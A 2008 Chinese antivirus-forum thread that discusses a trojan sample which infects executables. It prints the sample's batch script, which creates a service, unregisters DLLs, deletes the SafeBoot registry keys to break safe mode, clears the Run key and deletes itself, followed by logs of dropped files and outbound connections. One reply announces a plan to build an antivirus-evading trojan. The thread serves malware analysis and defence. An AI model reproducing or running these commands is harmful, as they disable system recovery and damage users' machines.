» 游客:  注册 | 登录 | 帮助  微点交流论坛 » 主动防御 » 好久没有质量这么高的了过全部感染型！！！   作者: 标题: 好久没有质量这么高的了过全部感染型！！！ 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #1  好久没有质量这么高的了过全部感染型！！！ “费尔主动防御也被过了，其他主动防御不清楚，下面跟帖的说把，感染d盘下全部可执行文件，没有防范措施的谨慎运行！！大家分析”             似乎很流行 BY:unknown author qnlydkhkgof besuujkbcncc ucygywqolvspz time 12:00:00 date 2004-08-17 ping 127.0.0.1 -n 3 sc.exe create hfhxsct BinPath= "C:\windows\hfhxsct.exe -win32" type= own type= interact start= auto DisplayName= mywjqweihilr sc.exe description hfhxsct ixddsvdlsoneelkz regsvr32.exe /u /s scrrun.dll regsvr32.exe /u /s shimgvw.dll regsvr32.exe /u /s itss.dll regsvr32.exe /u /s vbscript.dll regsvr32.exe /s jscript.dll reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F sc.exe start hfhxsct time 20:38:38 date 2008-06-08 del "C:\WINDOWS\Media\Windows XP 开始.wav" del "C:\WINDOWS\Media\Windows XP 信息栏.wav" del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav" del "C:\Documents and Settings\Administrator.SNOOPY-B36AC7C9\桌面\FXPTJKC\FXPTJKC.exe" /F del %0 exit ebwgadoqjbt 这毒运行完后我的宠物“倒霉蛋”真的变倒霉蛋了，可怜的娃变大红叉了 创建时间 文件名 创建者 2008-06-08 21:07:52 C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR.SNOOPY-B36AC7C9\桌面\FXPTJKC\YQTKHTNODGPA.TMP C:\WINDOWS\EXPLORER.EXE 2008-06-08 21:07:52 C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\启动\PLQZOMT.EXE C:\WINDOWS\RMXP1XM.EXE 2008-06-08 21:07:52 C:\WINDOWS\JYGRLHGZ.EXE C:\WINDOWS\RMXP1XM.EXE 2008-06-08 21:07:49 C:\WINDOWS\RMXP1XM.EXE C:\WINDOWS\WOWZDGLRLTPO.DLL 2008-06-08 20:58:56 C:\WINDOWS\WOWZDGLRLTPO.DLL C:\WINDOWS\HFHXSCT.EXE 2008-06-08 20:57:47 C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\启动\ZPGSSOTYDLZ.EXE C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR.SNOOPY-B36AC7C9\桌面\FXPTJKC\FXPTJKC.EXE 2008-06-08 20:44:54 C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR.SNOOPY-B36AC7C9\桌面\FXPTJKC\HFHXSCT.EXE C:\WINDOWS\EXPLORER.EXE 时间 处理结果 可疑程序进程名 可疑程序文件创建者 描述 2008-06-08 21:08:05 阻止 C:\WINDOWS\RMXP1XM.EXE C:\WINDOWS\WOWZDGLRLTPO.DLL 试图修改程序文件 2008-06-08 20:59:38 放行 C:\WINDOWS\WOWZDGLRLTPO.DLL C:\WINDOWS\HFHXSCT.EXE 其它可疑动作 时间 进程名 路径及参数 源IP 源端口 目的IP 目的端口 操作 2008-06-08 21:08:26 PLQZOMT.EXE C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\启动\PLQZOMT.EXE 0.0.0.0 1304 58.49.58.20 443 暂时禁止 2008-06-08 20:59:30 HFHXSCT.EXE C:\WINDOWS\HFHXSCT.EXE 0.0.0.0 2004 58.49.58.20 443 暂时放行 安全提示 如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现木马":Trojan-Downloader.Win32.Agent.xkf 卡巴斯基升级到最新版本 Trojan-Downloader.Win32.Agent.seb” ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 你的微笑 is 微点的骄傲！ http://hi.baidu.com/new/micropoint 2008-6-9 12:28 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #2  “磁碟机 3代.... 感染EXE” 转帖 ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 你的微笑 is 微点的骄傲！ http://hi.baidu.com/new/micropoint 2008-6-9 13:13 471795251 银牌会员 九三学社 积分 3818 发帖 3882 注册 2007-2-4 来自 山西省阳泉市晋东化工厂 #3   过几天我也做个这种木马…… 来试试…… 目标： 1 先过微点主防（这些年来越来越猛了……） 2 全过卡巴 3 全杀国内金山、瑞星 （江民不单独测试，给人家个面子，能查出来就查出来算了……） ※ ※ ※ 本文纯属【471795251】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-6-9 13:58 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #4     Quote: Originally posted by 471795251 at 2008-6-9 13:58: 过几天我也做个这种木马…… 来试试…… 目标： 1 先过微点主防（这些年来越来越猛了……） 2 全过卡巴 3 全杀国内金山、瑞星 （江民不单独测试，给人家个面子，能查出来就查出来算了……） 看看样本哦 木马想过微点 很难 ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 你的微笑 is 微点的骄傲！ http://hi.baidu.com/new/micropoint 2008-6-9 19:46 simonfour 高级用户 打酱油的！！ 积分 926 发帖 926 注册 2008-3-8 #5   啊！！我刚才运行的就是这个啊，恐怖！！！ ※ ※ ※ 本文纯属【simonfour】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-6-9 20:04 maliang 新手上路 积分 37 发帖 37 注册 2007-6-10 来自 上海 #6   确实够凶悍的！ ※ ※ ※ 本文纯属【maliang】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ WIN XP SP3+微点 2008-6-10 21:33 maliang 新手上路 积分 37 发帖 37 注册 2007-6-10 来自 上海 #7   确实够凶悍的！ ※ ※ ※ 本文纯属【maliang】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ WIN XP SP3+微点 2008-6-10 21:43 tustin 版主 积分 5092 发帖 5067 注册 2007-3-10 来自 重庆 #8   咱们微点表现不错，赞一个 ※ ※ ※ 本文纯属【tustin】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ Micropoint微點——克服滯后殺毒缺陷 開創主動防御時代 2008-6-10 22:02 天使的愤怒 新手上路 积分 11 发帖 11 注册 2008-6-9 来自 杭州 #9   哈哈，又是我们卡饭的兄弟o(∩_∩)o...，我也来自卡饭哦，呵呵。 ※ ※ ※ 本文纯属【天使的愤怒】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-6-11 17:05 论坛跳转: 微点软件公测区 安全快报  > 病毒快报  > 漏洞快报 微点产品在线技术支持  > 微点主动防御软件  > 预升级反馈专区  > 微点杀毒软件 微点用户交流区  > 微点新闻  > 微点软件使用交流  > 微点茶室 安全技术交流区  > 主动防御  > 反病毒  > 防火墙 综合区  > 电脑&数码  > 体育&娱乐&休闲  > 灌水区 版务管理 内部使用专区  可打印版本 | 推荐 | 订阅 | 收藏 [ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司 闽ICP备05030815号